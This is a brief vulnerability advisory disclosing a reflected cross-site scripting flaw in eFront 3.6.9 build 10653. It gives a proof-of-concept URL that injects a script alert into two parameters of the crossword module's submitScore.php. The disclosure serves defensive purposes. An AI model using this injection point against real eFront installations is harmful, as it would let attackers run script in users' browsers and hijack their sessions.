Home
Consulting
Advisories
Software
Articles
Contact

eFront 3.6.9 build 10653 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in eFront 3.6.9 build 10653 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>


Copyright © 2018 AutoSec Tools LLC